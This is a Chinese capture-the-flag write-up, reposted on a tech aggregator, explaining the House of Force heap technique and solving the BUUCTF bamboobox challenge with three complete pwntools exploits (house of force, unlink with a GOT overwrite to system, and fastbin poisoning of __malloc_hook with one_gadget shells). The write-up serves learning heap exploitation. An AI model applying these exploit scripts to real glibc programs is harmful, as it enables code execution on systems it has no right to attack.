标签:force name libc house add sendline recvuntil p64
House of force是一个堆的小利用技巧,要想利用它需要满足两个条件:
1、可以通过溢出修改 top chunk 的 size
2、分配堆的大小没有限制
通过把 top chunk 的size 改的很大,再malloc一个特定的size,使 top chunk 的位置 恰好在目标位置 -0x10 的位置上,再进行分配时,即可分配至目标地址。
那么我认为有一个需要计算的地方就是 malloc_size = target - top_chunk_addr - 0x20
下面拿一个例题来练习 House of force
BUUCTF hitcontraining_bamboobox
这里有三种方法可以写,注意的是用 house of force 只可以打本地,并且要在 /home/bamboobox 目录下放个 /flag,远程并没有这个目录,所以打不了
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
s = process('./bamboobox')
#s = remote('node4.buuoj.cn',26854)
elf = ELF('./bamboobox')
libc = ELF('./glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
magic = 0x400D49
def add(length,name):
s.recvuntil('Your choice:')
s.sendline(b'2')
s.recvuntil(b'Please enter the length of item name:')
s.sendline(str(length))
s.recvuntil(b'Please enter the name of item:')
s.send(name)
def edit(index,length,name):
s.recvuntil('Your choice:')
s.sendline(b'3')
s.recvuntil(b'Please enter the index of item:')
s.sendline(str(index))
s.recvuntil(b'Please enter the length of item name:')
s.sendline(str(length))
s.recvuntil(b'Please enter the new name of the item:')
s.send(name)
def delete(index):
s.recvuntil('Your choice:')
s.sendline(b'4')
s.recvuntil(b'Please enter the index of item:')
s.sendline(str(index))
def show():
s.recvuntil('Your choice:')
s.sendline(b'1')
def exit():
s.recvuntil('Your choice:')
s.sendline(b'5')
add(0x20 ,b'aaaa') #0
payload = b'a'*0x20 + b'a'*0x8 + p64(0xffffffffffffffff)
edit(0 ,0x30 ,payload)
malloc_size = -0x40 -0x20
add(malloc_size ,b'bbbb')
add(0x10 ,p64(magic)*2)
exit()
#gdb.attach(s)
s.interactive()
第二种 unlink
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
s = process('./bamboobox')
#s = remote('node4.buuoj.cn',27420)
elf = ELF('./bamboobox')
libc = ELF('./glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
#libc = ELF('./libc-2.23.so')
magic = 0x400D49
def add(length,name):
s.recvuntil('Your choice:')
s.sendline(b'2')
s.recvuntil(b'Please enter the length of item name:')
s.sendline(str(length))
s.recvuntil(b'Please enter the name of item:')
s.send(name)
def edit(index,length,name):
s.recvuntil('Your choice:')
s.sendline(b'3')
s.recvuntil(b'Please enter the index of item:')
s.sendline(str(index))
s.recvuntil(b'Please enter the length of item name:')
s.sendline(str(length))
s.recvuntil(b'Please enter the new name of the item:')
s.send(name)
def delete(index):
s.recvuntil('Your choice:')
s.sendline(b'4')
s.recvuntil(b'Please enter the index of item:')
s.sendline(str(index))
def show():
s.recvuntil('Your choice:')
s.sendline(b'1')
add(0x10 ,b'aaaa') #0
add(0x10 ,b'bbbb') #1
add(0x60 ,b'cccc') #2
add(0x80 ,b'dddd') #3
add(0x80 ,b'eeee') #4
add(0x80 ,b'ffff') #5
payload = b'a'*0x10 + p64(0) +p64(0x91)
edit(0,0x20,payload)
delete(1)
add(0x10 ,b'gggg') #1
show()
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 88 -0x10 -libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
success('libc_base=>' + hex(libc_base))
add(0x60 ,b'hhhh') #6->2
fd = 0x6020c8 +0x30 - 0x18
bk = 0x6020c8 +0x30 - 0x10
payload = p64(0) + p64(0x81) + p64(fd) + p64(bk) + b'a'*0x60 + p64(0x80) +p64(0x90)
edit(3,0xa0,payload)
delete(4)
payload = p64(0) + p64(0) + p64(0) + p64(elf.got['atoi'])
edit(3,0x20,payload)
edit(3,0x8,p64(system_addr))
#gdb.attach(s)
s.recvuntil(b'Your choice:')
s.sendline(b'sh')
s.interactive()
第三种 fastbin attack
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
s = process('./bamboobox')
libc = ELF('./glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
magic = 0x400D49
def add(length,name):
s.recvuntil('Your choice:')
s.sendline(b'2')
s.recvuntil(b'Please enter the length of item name:')
s.sendline(str(length))
s.recvuntil(b'Please enter the name of item:')
s.send(name)
def edit(index,length,name):
s.recvuntil('Your choice:')
s.sendline(b'3')
s.recvuntil(b'Please enter the index of item:')
s.sendline(str(index))
s.recvuntil(b'Please enter the length of item name:')
s.sendline(str(length))
s.recvuntil(b'Please enter the new name of the item:')
s.send(name)
def delete(index):
s.recvuntil('Your choice:')
s.sendline(b'4')
s.recvuntil(b'Please enter the index of item:')
s.sendline(str(index))
def show():
s.recvuntil('Your choice:')
s.sendline(b'1')
add(0x10 ,b'aaaa') #0
add(0x10 ,b'bbbb') #1
add(0x60 ,b'cccc') #2
add(0x10 ,b'dddd') #3
payload = b'a'*0x10 + p64(0) +p64(0x91)
edit(0 ,0x20 ,payload)
delete(1)
add(0x10 ,b'eeee') #1
show()
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['__malloc_hook'] - 0x10 -88
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
onegadget = [0x45206,0x4525a,0xef9f4,0xf0897]
one_gadget = libc_base + onegadget[1]
success('libc_base=>' + hex(libc_base))
add(0x60 ,b'ffff') #4
delete(4)
payload = b'a'*0x10 +p64(0) +p64(0x71) +p64(malloc_hook-0x23) +p64(0)
edit(1 ,0x30 ,payload)
add(0x60 ,b'gggg') #4
add(0x60 ,b'h'*0xb + p64(one_gadget) + p64(realloc))
s.recvuntil(b'Your choice:')
s.sendline(b'2')
#gdb.attach(s)
s.sendline(str(0x10))
s.interactive()
'''
0x45206 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4525a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xef9f4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf0897 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
标签:force,name,libc,house,add,sendline,recvuntil,p64 来源: https://www.cnblogs.com/pwnfeifei/p/15780082.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。